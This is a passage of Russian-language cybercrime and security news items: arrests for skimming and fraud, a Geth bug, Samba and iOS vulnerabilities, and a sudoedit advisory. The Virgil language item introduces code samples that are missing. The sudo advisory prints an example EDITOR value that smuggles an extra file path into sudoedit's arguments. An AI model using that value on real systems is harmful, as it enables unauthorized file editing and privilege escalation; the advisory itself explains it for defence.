хотя бы появится возможность узнать, что он поставил себе малварь и принять
меры.
Или не принять.
«Safety Check» сообщит, по какой причине расширение пропало из магазина –
вредонос в нём или его, например, убрал сам разработчик.
Между тем это выглядит, просто как плашка в настройках безопасности, в которую
не всякий юзер заглядывает, так что полезность пока под вопросом.
Фичу выкатят в версии Хром 117, но её уже можно протестировать и на 116-й в
порядке эксперимента, довольно крякнуть «Да, это была малварь» и закрыть
вкладку.
Edit: T.Hunter
Source: bleepingcomputer[.]com/news/google/google-chrome-to-warn-when-
installed-extensions-are-malware
В сети Ethereum обнаружили разделение цепочки блоков, вызванное тем, что операторы нод не смогли обновить ПО Geth до последней версии, включающей в себя критически важное исправление.
Geth представляет собой самое популярное программное обеспечение, используемое для присоединения к блокчейну Ethereum. Еще три дня назад разработчики ПО выпустили срочное обновление уязвимости в коде, не позволяющей участникам сети создавать новые блоки. Саму же уязвимость обнаружила команда Go Ethereum еще 18 августа, уточнив, что 24 числа выйдет исправление, но при этом они не назвав точную причину возникновения ошибки.
После 24 числа выяснилось, что все цепочки, совместимые с EVM подвержены риску. Операторов предупредили, чтобы они в обязательном порядке обновили свои ноды и прекратили осуществлять транзакции внутри сети до обновления Geth до последней версии. Консенсусная ошибка потенциально затронет больше половины нод в сети Ethereum, в результате чего они могут отделиться от основной сети.
Разработчик ПО для Ethereum, Мариус Ван Дер Вейден отметил, что после появления информации об ошибке возникновение эксплоита было неизбежно. По его словам, аноним или группа анонимных злоумышленников уже воспользовались уязвимостью, затронувшей операторов, использующих ранние версии Geth. Речь о нодах с установленным Geth версии 1.10.7 и предшествующих ей. По данным Ethernodes, в настоящий момент 74,6% общего числа нод Ethereum пользуются Geth и лишь 28,4% из клиентов данного ПО установили версию 1.10.8, известную также как “Hades Gamma”, вышедшую в этот вторник. Иначе говоря, сейчас около 53% от всех нод в опасности из-за работы с наличием критической ошибки инфраструктуры. Из 5289 нод ETH программное обеспечение Geth используют 3947. Ван Дер Вейден отказался рассказать подробности об атаке, подтвердив только то, что эксплоит был использован одним адресом.
Главная опасность для тех, кто пользуется старой версией в том, что это может как минимум привести к атакам с двойным расходом, когда злоумышленники тратят определенную сумму токенов, после чего выполненная ими транзакция перезаписывается альтернативной цепочкой. Аналитик Игорь Игамбердиев предположил, что проблема уже могла затронуть Binance Smart Chain.
Невзирая на отделение части нод от главной сети, пока это не привело к серьезному разделению. Причиной этого руководитель службы безопасности Ethereum Foundation назвал использование майнерами корректной цепочки, которая также является длиннейшей или “каноничной”.
Среди трех майнинг-пулов, добывающих свои запасы криптовалют с помощью прежней версии Geth разработчик ядра Ethereum выделил BTC.com, Binance, а также Flexpool. Представители последнего заявили, что знают об ошибке и постараются оперативно уведомить о ней другие крупные пулы криптодобытчиков.
Подобные проблемы ранее уже возникали в сети ETH. К примеру, год назад около 12% нод было невозможно использовать вследствие ошибки, скомпрометировавшей половину нод Parity и все ноды OpenEthereum.
Тем временем, курс второй по величине криптовалюты “не впечатлили” проблемы внутри сети и он продолжил расти, достигнув отметки 3280 долларов на криптовалютной бирже Huobi.
Полевой офис ФБР в Лос-Анджелесе (штат Калифорния) совместно с полицией Румынии провел впечатляющую спецоперацию, которая стала логичным завершением расследования, продолжавшегося более трех лет. В рамках этого дела силовики пытались установить всех, кто входил в группировку, члены которой устанавливали скимминговые устройства в банкоматы.
Итогами операции стали аресты 48 человек, изъятие миллиона долларов в различной валюте и конфискация 11 транспортных средств, связанных с преступниками. Основная миссия группировки состояла в краже данных кредитных карт в США с последующей переправкой украденных денег сначала в страны Западной Европы, а затем — в Румынию.
Точное количество американцев, пострадавших от действий этнической группировки, не сообщается. Известно, что их — не менее 8000 человек. Все подозреваемые в той или иной степени были связаны с печально известной группировкой скиммеров, которая промышляла на мексиканском курорте Ривьера- Майя и в какой-то момент распоряжалась 12 процентами профильного рынка, а также непосредственно с ее лидером Флорианом Тудором (Florian Tudor). Ему предъявлены обвинения в мошенничестве в Мексике и в покушении на убийство в Румынии.
В Турции заявили о задержании лидера российской ОПГ Шамиля Амирова.
В Турции задержан один из лидеров якобы действующей в России организованной преступной группировки (ОПГ), Шамиль Амиров. Глава МВД страны Али Ерликая уточнил, что подозреваемый был пойман по месту проживания в стамбульской провинции Сарыер в ходе операции Kafes-15.
Правоохранительные органы сообщили, что Амиров разыскивался Интерполом по «синему» бюллетеню
» и обвинялся в мошенничестве и членстве в российской группировке Thieves in Law («Воры в законе»).
Раскрыты подробности о личности Амирова
По информации турецких изданий, Амирову 45 лет, он родился в России.
Утверждается, что до приезда в Турцию он также разыскивался за членство в ОПГ
и мошенничество на родине.
Поздравляем наших полицейских, которые блестяще осуществили операцию. Мы обязуемся очистить нашу страну от международных и национальных организованных преступных организаций. Мы будем ловить их представителей одного за другим и привлечем всех к ответственности - Али Ерликая глава МВД Турции
Задержание связали с делом супругов-бизнесменов из Турции
Согласно некоторым данным, Амиров был задержан в связи с громким делом
турецкой пары, блогеров-миллионников Дилана и Энгин Полат, которые были
заключены под арест в начале ноября по подозрению в отмывании денег, подделке
документов, уходе от уплаты налогов и организации поставок запрещенных веществ
под видом косметических средств.
Известно, что супруги привлекли внимание правоохранительных органов публикациями в соцсетях о своей роскошной жизни — они демонстрировали гигантский дом с золотой мебелью, украшения с крупными бриллиантами, дорогие машины, брендовые вещи и многочисленные путешествия по миру.
В результате полиция провела массовые проверки в 15 компаниях, принадлежащих супругам, различной направленности — от реализации косметики до продажи алюминия. Имущество блогеров и их родственников было конфисковано.
Сотрудники Управления экономической безопасности и противодействия коррупции ГУ МВД России по Санкт-Петербургу и Ленинградской области совместно с коллегами из девяти территориальных подразделений МВД России задержали подозреваемых в сфере оказания финансовых услуг.
«Предварительно установлено, что злоумышленники находили в Интернете граждан с плохой кредитной историей, которые желали оформить заем. Аферисты убеждали их воспользоваться услугами так называемых брокеров, которые якобы могут помочь получить кредит в любом банке. Клиентам назначали встречу в офисе, определяли их платежеспособность и устанавливали цену за свои услуги. После оплаты заказчики обращались в финансово-кредитные учреждения, где им отказывали в выдаче денег. В свою очередь лжеброкеры денежные средства не возвращали и переставали выходить на связь.
В результате оперативно-розыскных мероприятий сотрудники полиции задержали подозреваемых на территории нескольких регионов России. Проведено свыше 50 обысков, изъяты печати, документы, компьютерная техника, мобильные телефоны и другие предметы, имеющие доказательственное значение», – сообщила официальный представитель МВД России Ирина Волк.
Возбуждено 29 уголовных дел по признакам преступлений, предусмотренных частью 4 статьи 159 УК РФ, которые в настоящее время соединены в одно производство. Четырнадцати фигурантам избраны различные меры пресечения.
«В настоящее время полицейские проводят мероприятия, направленные на установление всех обстоятельств противоправной деятельности», – добавила Ирина Волк.
Минцифры совместно с ФСБ и МВД разрабатывает пакет законопроектов, которые ограничат использование сим-боксов и виртуальных автоматических телефонных станций (ВАТС). Эти технологии применяются для организации колл-центров и распределения звонков по добавочным номерам сотрудников, но сейчас их использование практически не регулируется, что даёт мошенникам широкие возможности для злоупотреблений. Информацию о разработке этих законопроектов [подтвердили](https://www.vedomosti.ru/technology/articles/2024/12/16/1081534-mintsifri- i-silovie-vedomstva-gotovyat-zakonoproekt-o-regulirovanii-sim-boksov-i- virtualnih-ats) источник «Ведомостей» в одном из федеральных операторов, собеседник из профильной ассоциации и представитель крупной компании в области информационной безопасности.
На форуме «Антифрод» 5 декабря следователь отдела организации расследования дистанционных хищений Следственного департамента МВД России подполковник юстиции Анастасия Понкратова сообщила, что работа над законопроектом уже идёт. По её словам, МВД активно участвует в процессе, внося свои замечания, часть которых была поддержана на недавнем совещании. Других подробностей она не раскрыла.
По словам источника в федеральном операторе, текущая версия законопроекта требует, чтобы услуги связи с использованием сим-боксов предоставлялись только на основании договора с оператором. Договор должен содержать данные о сим- картах, идентификатор устройства, адрес его установки и цель использования. При отсутствии или недостоверности этой информации предоставление услуг будет запрещено. Использовать сим-боксы смогут исключительно юридические лица и индивидуальные предприниматели. Собеседник в профильной ассоциации отметил, что в предложенных мерах есть проблема: трафик сим-боксов может «прикидываться» трафиком обычных мобильных телефонов, а значит, вычленить его из всего объема звонков будет довольно трудно.
Виртуальные АТС позволяют компаниям управлять звонками без использования физического оборудования, например для маршрутизации вызовов, голосовой почты или интеграции с CRM-системами. Однако эта технология активно используется злоумышленниками для подмены номеров, создания анонимных каналов связи и проведения фишинговых атак. Законопроект предусматривает, что такие системы должны располагаться на территории России, использовать идентификацию абонентов через ЕСИА, иметь сетевой адрес, принадлежащий РФ, и применять определённый ресурс нумерации. Также обязательным будет использование СОРМ.
Предлагаемые меры входят в состав пакета инициатив, направленных на борьбу с телефонным мошенничеством. Как заявил министр цифрового развития Максут Шадаев, в рамках «антифрод-пакета» будет подготовлено 30 законопроектов. Среди них будут включены нормы, позволяющие гражданам удалённо запрещать оформление кредитов на их имя, вводить двухдневный «период охлаждения» для финансовых операций и добавлять второй доверенный контакт для их подтверждения.
По словам представителя «Мегафона», компания поддерживает предложенные меры, направленные на борьбу с мошенничеством. При этом он отметил, что каждый законопроект из общего «антифрод-пакета» требует тщательной проработки, чтобы избежать неудобств для потребителей. Представитель добавил, что сим-боксы активно применяются для передачи голосового трафика из-за рубежа через IP- телефонию, активации аккаунтов на маркетплейсах и накрутки рейтингов товаров и услуг. Однако попытки привлечь организаторов подобных схем к ответственности не всегда дают результат.
Представитель оператора T2 сообщил, что компания принимала участие в обсуждении инициатив, которые вошли в «сборный» законопроект по кибербезопасности. По его словам, инициатива существенно ограничивает использование виртуальных АТС и сим-боксов и вносит изменения во множество федеральных законов. Представитель T2 уточнил, что регулирование включает введение административной и уголовной ответственности за незаконное применение сим-боксов с наказанием вплоть до трех лет лишения свободы.
Эксперты отмечают, что предложенные инициативы технически реализуемы. Например, аномалии в сигнале или снижение качества связи при использовании сим-боксов могут служить индикаторами для их выявления. Однако они предупреждают, что злоумышленники могут пытаться обходить новые ограничения, используя фиктивные юридические лица или другие серые схемы.
Регистрация сим-боксов напоминает инициативы по регистрации устройств по уникальным идентификаторам IMEI, которые обсуждались в 2018 году, но не были реализованы. В данном случае регулирование ограничено корпоративным сегментом, что упрощает контроль и внедрение. Эксперты уверены, что это позволит сделать рынок более прозрачным и безопасным, а также сократить объём противоправных действий на 10% и более.
Гражданская гвардия Испании (Guardia Civil), в тесном взаимодействии с Национальной полицией и Налоговым агентством, успешно разоблачила и ликвидировала международную преступную организацию, специализировавшуюся на незаконной продаже таблеток для похудения с амфетаминовым производным. В результате операции были арестованы 20 членов группы, которые использовали социальные сети и веб-сайты для продажи таблеток под видом безобидной пищевой добавки. В ходе обысков было изъято свыше 500 000 таблеток, 200 000 евро наличными, различные виды огнестрельного оружия и наркотические вещества.
Расследование было инициировано в феврале этого года, после сигнала от Испанского агентства по лекарственным средствам и товарам для здоровья. Агентство выявило, что таблетки для похудения содержат амфетаминовое соединение, представляющее серьезную угрозу для здоровья. Кроме того, были зарегистрированы жалобы от людей, у которых из-за этих таблеток возникли проблемы со здоровьем.
В результате полицейского расследования удалось получить полную картину работы организации и установить личности всех её участников. Через социальные сети и веб-сайты, прикрываясь анонимностью, они обманывали полицию, предоставляя ложную информацию и скрывая свою деятельность.
Центром операций преступной сети была клиника красоты, где жандармы нашли главное логистическое звено группы. Оттуда осуществлялись связи с производителями таблеток в Турции и координация их приобретения и распространения.
Во время расследования были конфискованы четыре чемодана с более чем 120 килограммами косметических средств, включая таблетки для похудения, в аэропорту Адольфо Суарес — Мадрид-Барахас. Один из лидеров организации призналась, что часть группы оставила ей долг в размере 460 000 евро на покупку косметических средств, что подтвердило существование внутреннего конфликта в сети.
Рейды в Малаге, Гранаде и Мадриде
Заключительная фаза операции прошла в провинциях Малага, Гранада и Мадрид. В ходе четырех обысков было изъято почти 10 килограммов наркотиков, огнестрельное оружие, более 500 000 таблеток, дорогостоящий автомобиль и 200 000 евро наличными. Были заблокированы 9 банковских счетов и арестованы 20 человек, которых передали в суд по обвинению в преступлениях против здоровья населения, мошенничестве, отмывании денег и участии в преступной организации.
Мнения из других СМИ:
Организация использовала хорошо разработанную систему для маскировки своей деятельности, используя подставные компании и многочисленные банковские счета для отмывания денег и сокрытия следов нелегальной продажи. Это позволило им долгое время успешно избегать правоохранительных органов. Мошеннические схемы, задействованные преступниками, включали также использование курьеров для доставки товаров по всей Европе, что значительно усложняло задачу правоохранительных органов по отслеживанию цепочки поставок.
Удалось установить, что преступная группа действовала не только на территории Испании, но и имела связи с различными международными партнёрами, включая производителей сырья в Турции и распространителей в других странах Европы. Это свидетельствует о высоком уровне организации и координации между членами группы. В Испании таблетки рекламировались и продавались через социальные сети и специальные веб-сайты, ориентированные на людей, ищущих быстрые методы для похудения. Расследование также выявило использование мессенджеров и зашифрованных коммуникаций для координации деятельности и обмена информацией.
После арестов и конфискаций был наложен арест на имущество обвиняемых, включая движимое и недвижимое, с целью восполнения ущерба, причинённого пострадавшим и государству. Подразделения по борьбе с организованной преступностью продолжают работу по идентификации всех звеньев цепочки и изучению возможных дополнительных преступлений, связанных с этой сетью. Важной задачей следствия стало также выявление всех каналов финансирования и блокировка средств, которые могли бы быть использованы для дальнейшего финансирования незаконных операций.
Эта операция стала значительным ударом по международной преступной деятельности, связанной с продажей поддельных и опасных для здоровья препаратов. Совместная работа Гражданской гвардии, Национальной полиции и Налогового агентства вновь продемонстрировала эффективность межведомственного взаимодействия в борьбе с организованной преступностью. Будущие усилия будут направлены на предотвращение повторения подобных ситуаций и мониторинг рынка на предмет возможного появления новых нелегальных препаратов.
Разработчики представили Virgil — новый системный язык программирования, нацеленный на создание компактных и производительных приложений. Для работы с ним потребуется:
По словам одного из создателей языка, Бена Тицера , который также принимал участие в разработке WebAssembly, Virgil не ставит своей целью конкурировать с другим молодым языком Zig, предназначенным для подобных задач.
Virgil лишен устаревших недостатков и обладает мощными возможностями для написания надежного системного кода. Среди потенциальных областей применения — виртуальные машины, компиляторы, ядра операционных систем, сетевые стеки и другие низкоуровневые компоненты.
Сейчас, наряду с Rust появляется много новых языков, ориентированных на создание легковесных высокопроизводительных систем с кроссплатформенными компиляторами. При этом, по утверждению Тицера, Rust не может выполнять некоторые задачи, которые под силу Virgil.
Запустив Warp — терминал на базе Rust, пользователю нужно клонировать репозиторий. Если вы давно не использовали GitHub, команду для клонирования можно найти на главной странице репозитория под вкладкой код:
Теперь мы просто клонируем репозиторий в командной оболочке:
За основу взята идея исключения устаревших элементов при проектировании высокопроизводительных систем. Вместо этого учитываются современные требования к оптимизации компиляторов, структурам кода, обработке ошибок, безопасности и другие факторы, важность которых менялась с течением времени. Например, сегодня память – довольно дешевый ресурс, но безопасность имеет первостепенное значение, в то время как 30 лет назад ситуация была обратной.
После установки Virgil можно сразу же приступать к написанию и запуску кода. Вот так будет выглядеть программа «Hello World»:
Данный код можно запустить со встроенным интерпретатором Virgil:
Однако для компиляции программы требуется указать целевую аппаратную архитектуру. К счастью, при запуске на локальной машине Virgil способен автоматически определить ее:
После компиляции в текущем каталоге появляется исполняемый файл. (Следует учесть, что показанное в Warp время выполнения может не отражать реальную производительность).
Запуск скомпилированного кода выводит приветствие:
Таким образом, Virgil позволяет как интерпретировать, так и компилировать написанный код, адаптируясь к аппаратной платформе.
В языке также используется концепция изменяемых и неизменяемых переменных. Изменяемые переменные вводятся ключевым словом var, а неизменяемые — def:
Функции объявляются с указанием типов параметров и возвращаемого значения, например:
Классы в Virgil имеют схожий с другими ЯП синтаксис:
Уникальной особенностью являются алгебраические типы данных — комбинация полиморфизма, конструкторов и сопоставления с образцом:
В Virgil есть поддержка многопоточности и асинхронного программирования с использованием ключевого слова async:
Язык позволяет напрямую работать с низкоуровневой памятью через опасные необработанные указатели:
Таким образом, Virgil предоставляет возможность эффективной кросс-компиляции, генерируя машинный код или байт-код в зависимости от целевой платформы. Сам язык использует подобный кросс-компилятор, так что весь тулчейн написан на нем же.
Это лишь вводное описание, и многие возможности языка остались за кадром. Очевидно, что проект активно развивается. Программировать можно как в объектно-ориентированном стиле, так и в функциональном, что иногда называют мультипарадигмальным подходом.
github.com/titzer/virgil?utm_source=the+new+stack&utm_medium=referral&utm_content=inline- mention&utm_campaign=tns+platform
Сотрудники национальной полиции успешно пресекли незаконную схему распространения аудиовизуального контента, которая действовала с 2015 года и позволила получить более 5 300 000 евро. В рамках операции, проведенной в Лас- Пальмас-де-Гран-Канария, Мадриде, Овьедо и Малаге, были задержаны восемь человек, также были произведены обыски в двух жилищах. Кроме того, было заблокировано 16 веб-сайтов, которые занимались распространением IPTV-контента и незаконным захватом и хранением такого контента.
Расследование началось в ноябре 2022 года после жалобы членов Альянса за творчество и развлечения на руководителей двух веб-сайтов, где, по их утверждениям, продавался видеоконтент вопреки их правам на интеллектуальную собственность.
Комплексное компьютерное и банковское расследование, а также другие методы полицейской работы, позволили экспертам Центрального отдела по борьбе с киберпреступностью собрать улики, указывающие на то, что зарегистрированные и управляемые сайты были связаны с несколькими компаниями, которыми руководил главный подозреваемый, гражданин Нидерландов. Предполагается, что этот человек возглавлял деловую и криминальную сеть, состоящую в основном из жителей Гран- Канарии, которая маскировалась под законную бизнес-структуру и позволила осуществить незаконные доходы в размере более 5 300 000 евро.
Таким образом, более 130 международных телевизионных каналов, тысячи фильмов и сериалов стали нелегально доступными для граждан по всему миру.
Эта международная криминальная группировка применяла передовые технологии и современное оборудование для перехвата сигналов, передаваемых через спутники во многих странах. Затем они усиливали и расшифровывали полученный мультимедийный контент, который потом незаконно публично распространяли. Гражданам всего мира стало доступно более 130 международных телевизионных каналов и тысячи фильмов и сериалов. Таким образом, они взимали плату от каждого из своих более чем 14 000 подписчиков в размере от 10 до 19 евро в месяц или от 90 до 169 евро в год в зависимости от типа подписки. Все это причиняло ущерб правообладателям, производителям и распространителям этих произведений искусства.
В ходе расследования были задержаны основные члены этой преступной сети, большинство из них занимали высокие должности и выполняли важные функции в создании, поддержке и расширении преступной деятельности, которая в данный момент расследуется. В испании было проведено два одновременных обыска — в Лас-Пальмас-де-Гран-Канария и в Мадриде. В ходе этих обысков были изъяты автомобиль и два компьютера. Кроме того, на банковских счетах было заморожено 80 000 евро.
Также были перехвачены и заблокированы серверы и 16 веб-страниц, которыми управляла эта преступная организация. Поэтому пользователи, пытающиеся получить доступ к этим ресурсам, в настоящее время не могут это сделать и перенаправляются на веб-страницу национальной полиции, где они видят сообщение о перехвате страницы.
Сотрудники ОБК УМВД России по Тверской области и оперативники уголовного розыска задержали семерых участников организованной группы. Студенты местных колледжей в возрасте от 19 до 21 года подозреваются в совершении серии интернет-мошенничеств.
«Предварительно установлено, что в течение двух лет злоумышленники использовали специальное программное обеспечение для незаконного получения доступа к личным кабинетам россиян на Едином портале государственных и муниципальных услуг. Используя данные граждан, от их имени оформляли в микрофинансовой организации займы, а деньги похищали», – рассказала официальный представитель МВД России Ирина Волк.
В результате противоправных действий пострадали 103 жителя разных регионов России, ущерб составил не менее 900 тысяч рублей.
«В ходе обысков в жилищах задержанных полицейские изъяли свыше 200 сим-карт, мобильные телефоны, ноутбуки и также другие предметы, имеющие доказательственное значение.
Следственными органами возбуждено уголовное дело по признакам преступления, предусмотренного частью 4 статьи 159 УК РФ. Решается вопрос об избрании в отношении фигурантов меры пресечения», – сообщила официальный представитель МВД России Ирина Волк.
Downradar сообщает о тысячах жалоб пользователей на работу интернет-ресурсов в России – не открываются сайты, не работают поисковики.
Пользователи из разных регионов России сообщают о масштабных сбоях в работе
российских интернет-ресурсов. Об этом свидетельствуют данные Downradar.
По актуальным на момент публикации данным, сбои наблюдаются в функционировании
десятков ресурсов в доменной зоне RU – поисковиков, приложений банков,
маркетплейсов, сайтов телеком-операторов.
Во вторник 30 января сбой также произошел
в работе облачного провайдера Selectel. В пресс-службе компании отметили, что
по внешним признакам перестала работать проверка подлинности записей в DNS-
зоне .ru.
«Скорее всего, при очередном плановом изменении файла DNS-зоны .ru произошла
ошибка подписи. С тех пор запросы не проходят проверку на подлинность», –
отметили в пресс-службе компании.
В Минцифры позже сообщили, что доступ к сайтам рунета будет восстановлен в
ближайшее время.
«Возникла техническая проблема, затронувшая зону .RU, связанная с глобальной
инфраструктурой DNSSEC. Специалисты Технического центра Интернет и МСК-IX
работают над ее устранением», – отметили в Минцифры.
Оперативники БСТМ МВД России совместно со следователями ГСУ ГУ МВД России по г. Москве и сотрудниками ФСБ России пресекли деятельность организованной группы, состоящей из руководителей крупных столичных PR-агентств и их партнеров. Они подозреваются в вымогательстве.
«Предварительно установлено, что злоумышленники в сети принадлежащих им популярных телеграм-каналов публиковали клеветнические сведения о политиках, бизнесменах и представителях силовых ведомств. За удаление этой информации из медиапространства и отказ от ее дальнейшего тиражирования они требовали передать денежные средства в особо крупном размере.
Двое руководителей PR-агентств решением Тверского районного суда г. Москвы заключены под стражу.
В жилищах подозреваемых и используемых ими офисах полицейские провели обыски. Изъяты носители информации со сведениями о размещенных негативных публикациях и отчетами о полученной прибыли, а также другие предметы, имеющие доказательственное значение. По имеющейся информации, в криминальной схеме были задействованы около 20 человек. Роль каждого из них устанавливается.
Следователем ГСУ ГУ МВД России по г. Москве объединены в одно производство уголовные дела по признакам преступлений, предусмотренных частью 3 статьи 163 УК РФ. Расследование продолжается», - сообщила официальный представитель МВД России Ирина Волк.
In Sudo before 1.9.12p2, the sudoedit (aka -e) feature mishandles extra arguments passed in the user-provided environment variables (SUDO_EDITOR, VISUAL, and EDITOR), allowing a local attacker to append arbitrary entries to the list of files to process. This can lead to privilege escalation.
Affected versions are 1.8.0 through 1.9.12.p1
The problem exists because a user-specified editor may contain a "--"
argument that defeats a protection mechanism, e.g., an EDITOR='vim --
/path/to/extra/file' value.
Please note that for the exploitation to work it requires that the sudoers file be configured to allow the malicious user to run sudoedit. If no users have been granted access to sudoedit there is no impact.
Sources:
[https://www.pro-linux.de/sicherheit/2/71712/Überschreiben-von-dateien-in-
sudo.html](https://www.pro-linux.de/sicherheit/2/71712/%C3%9Cberschreiben-von-
dateien-in-sudo.html)
https://www.csa.gov.sg/singcert/Alerts/al-2023-009
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22809
В Минобороны России опровергли сообщения о взломе хакерами Anonymоus официального сайта ведомства
В министерстве отметили, что все технические и программные средства интернет-портала функционируют в штатном режиме.
« Распространяемая в соцсетях диванными борцами за перемогу Украины
информация о якобы взломе хакерской группировкой Anonymоus сайта Минобороны
России и «похищении» персональных данных сотрудников военного ведомства —
примитивный до смеха фейк », — говорится в сообщении.
В ведомстве отметили что списки персональных данных военнослужащих и других
сотрудников Минобороны России не хранятся на серверах сайта ведомства, так как
это запрещено российским законодательством.
Все технические и программные средства интернет-портала Минобороны функционируют с заданными параметрами в штатном режиме, добавили в пресс- службе.
Ранее в твиттер сообщали, что хактивисты якобы взломали сайт Минобороны России и завладели информацией о сотрудниках министерства.. «Сайт Министерства обороны России не работает», — написали там.
При проверке, в распространяемом архиве, оказался дистрибутив медиаплеера VLC и небольшая выборка паролей по доменам gov.ru и mil.ru из очень старых утечек.
Опубликованы корректирующие выпуски пакета 4.15.5, 4.14.12 и 4.13.17 с устранением 3 уязвимостей. Наиболее опасная уязвимость (CVE-2021-44142) позволяет удалённому атакующему выполнить произвольный код с правами root на системе с уязвимой версией Samba. Проблеме присвоен уровень опасности 9.9 из 10.
Уязвимость проявляется только при использовании VFS-модуля vfs_fruit с параметрами по умолчанию (fruit:metadata=netatalk или fruit:resource=file), обеспечивающего дополнительный уровень совместимости с клиентами mac OS и улучшающего переносимость с файловыми серверами Netatalk 3 AFP. Проблема вызвана переполнением буфера в коде разбора метаданных с расширенными атрибутами (EA), вызываемого во время открытия файлов в smbd. Для осуществления атаки пользователь должен иметь доступ на запись к расширенным атрибутам файла, при том, что атака может быть проведена и гостевым пользователем, если ему разрешена подобная запись.
Остальные две узвимости:
Уязвимость CVE-2022-0336 позволяет пользователю Samba AD DC выдать себя за другой сервис и организовать перехват адресованного этому сервису трафика. Для атаки пользователь должен иметь право изменения атрибута servicePrincipalName в учётной записи.
Уязвимость CVE-2021-44141 может привести к утечке информации о существовании файлов и каталогов в области ФС за пределами экспортируемого раздела Samba. Атака осуществляется через манипуляцию с символическими ссылками.
21-летний житель Запорожья, которого в октябре задержали за подделку программы "Дію", получил возможность разработать дизайн для одного из проектов Министерства цифровой трансформации Украины.
Об этом в интервью «Сегодня» рассказал министр цифровой трансформации Украины Михаил Федоров.
«Сейчас он помогает нашему министерству в одном из проектов, создавая его дизайн», - раскрыл судьбы парня Михаил Федоров.
На уточняющий вопрос, что работа в министерстве не освобождает его от ответственности, министр сказал: "Конечно, нет, он еще будет иметь суд, который и решит его ближайшее будущее. Я задавал ему разные вопросы, ведь он до этого занимался интернет-трафиком, привлекал клиентов в различные бизнесы. Я пытался узнать о его компетенции. И мы поняли, что дизайн - это та область, где ему самое интересное развиваться. Сейчас он делает дизайн нашему проекту, и вскоре мы увидим результаты его работы.
Подделать невозможно
Михаил Федоров подчеркнул, что юный хакер не делал копию "Дію". Он только разработал веб-ресурс, который визуально был похож на "Дію".
"Саму программу подделать невозможно. "Дію" имеет доступ к государственным реестрам, имеет свою архитектуру, способы идентификации и так далее ", - заверил" Сегодня "Федоров.
• Source: [https://vlada.segodnya.ua/ua/vlada/...elaet-v-mincifry-20-letniy- haker-1587880.html](https://vlada.segodnya.ua/ua/vlada/sobytiya/skopiroval- diyu-i-poluchil-rabotu-chto-delaet-v-mincifry-20-letniy-haker-1587880.html)
Уязвимость можно использовать для получения доступа к заметкам пользователя.
В день выпуска компанией Apple версии операционной системы iOS 15 испанский
исследователь в области кибербезопасности
[опубликовал](https://twitter.com/VBarraquito/status/1438199319648157704?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1438199319648157704%7Ctwgr%5E%7Ctwcon%5Es1_&ref_url=https%3A%2F%2Ftherecord.media%2Fresearcher-
discloses-iphone-lock-screen-bypass-on-ios-15-launch-day%2F) информацию об
уязвимости обхода экрана блокировки в iPhone. Уязвимость можно использовать
для получения доступа к заметкам пользователя.
Хосе Родригес опубликовал подробности об обходе экрана блокировки после того,
как Apple преуменьшила значение аналогичных проблем ранее в этом году (
CVE-2021-1835 и
CVE-2021-30699 ),
исправленных в апреле и мае соответственно. Две проблемы позволяли
злоумышленникам получить доступ к приложениям для обмена мгновенными
сообщениями, таким как Twitter, WhatsApp или Telegram, даже когда телефон был
заблокирован.
По словам Родригеса, Apple разработала меры по предотвращению эксплуатации
уязвимостей, но ничего не исправила и не уведомила исследователя. Из-за
непрофессионального подхода Apple ИБ-эксперт опубликовал вариант того же
обхода экрана блокировки, но на этот раз использовал службы Apple Siri и
VoiceOver для доступа к приложению Notes.
Бывшего военнослужащего армии США Джозефа Асана-младшего оштрафовали и отправили в тюрьму за масштабное интернет-мошенничество. Об этом Министерство юстиции сообщило на официальном сайте.
Как выяснили правоохранители, уйдя в отставку 24-летний Джозеф Асан из города Дейтона-Бич во Флориде начал зарабатывать на жизнь, придумав масштабную систему по обману отдельных людей и целых компаний в Интернете. С февраля 2018 по январь 2019 года ему удалось получить около $1,8 млн вместе с несколькими подельниками, включая еще одного американского ветерана — Чарльза Огози. Власти США не называют точное количество жертв мошенников, но отметили, что их было несколько десятков.
Первым делом Джозеф Асан и его помощники принялись за пожилых людей на сайтах знакомств и в социальных сетях. Они создавали фейковые профили, знакомились с жертвами, намекая на отношения, а затем начинали выманивать у них деньги. Кроме того, мошенники рассылали электронные письма с требованиями оплатить счета в разные структуры, среди пострадавших оказалась даже организация ветеранов морской пехоты США.
"Среди многих жертв интернет-мошенничества, которым способствовал Джозеф Асан, были пожилые женщины и мужчины, которых жестоко обманом заставили поверить в то, что они общаются онлайн с потенциальными романтическими партнерами", — цитирует ZDNet прокурора Одри Штраус.
Федеральные власти вышли на след преступников еще в 2019 году, однако долго не могли привлечь их к ответственности. Как оказалось, Джозеф Асан и его сообщники использовали хитрую схему по обналичиванию средств — они открыли минимум 10 банковских счетов на имя вымышленных кампаний, чтобы переводить деньги на карточки и снимать в банкоматах. В итоге правоохранители не могут отследить большую часть украденных средств, которые перевели в наличные.
В октябре 2019 года Джозефа Асана арестовали по обвинению в групповом мошенничестве, а в декабре 2020 года мужчина признал себя виновным. В сентябре 2021 года его приговорили к 46 месяцам лишения свободы, а после выхода из тюрьмы мошенник будет еще три года находиться под пристальным вниманием правоохранителей. Вдобавок, суд заставит Асана выплатить штраф в размере $184 723 и возместить пострадавшим $1,792,015.
Как дополняет ZDNet, в июле этого года жителя Техаса Ахабуэ Эхиса Оноимоимилина в Хьюстоне приговорили к семи годам лишения свободы и выплате более $865 тыс. за аналогичные преступления. Этот гражданин обманом присвоил более $2,2 млн. Федеральная торговая комиссия подсчитала, что в 2020 году жертвы романтических афер в среднем потеряли по $2500, а в общем — около $304 млн, и это только по зарегистрированным случаям.
• Source: justice[.]gov/usao-sdny/pr/us-army-reservist-sentenced-46-months- fraud-and-money-laundering-scheme-involving-theft
• Source: [https://www.zdnet.com/article/us-mi...-prison-sentence-for- operating-romance-scams/](https://www.zdnet.com/article/us-military-reservist- lands-himself-prison-sentence-for-operating-romance-scams/)
23-летняя студентка из Израиля поделилась своей историей о том, как продала свою внешность компании Hour One, использующей технологию Deepfake для создания видеоперсонажей.
Израильский стартап занимается тем, что создает цифровых клонов при помощи алгоритмов ИИ и Deepfake. Многие подобные компании нанимают для этого профессиональных актеров, моделей, ведущих. Однако в случае с Hour One никаких навыков от "прототипов" не требуется. "Вам просто нужно быть готовым передать права на использование вашего лица", — пишет издание.
Израильтянка по имени Лири учится в университете и подрабатывает официанткой. Однажды она увидела объявление о наборе прототипов для создания цифровых персонажей, и решила поучаствовать в проекте, тем более, что за это заплатили. Однако девушка говорит, что понятия не имеет, чем занимаются ее цифровые клоны.
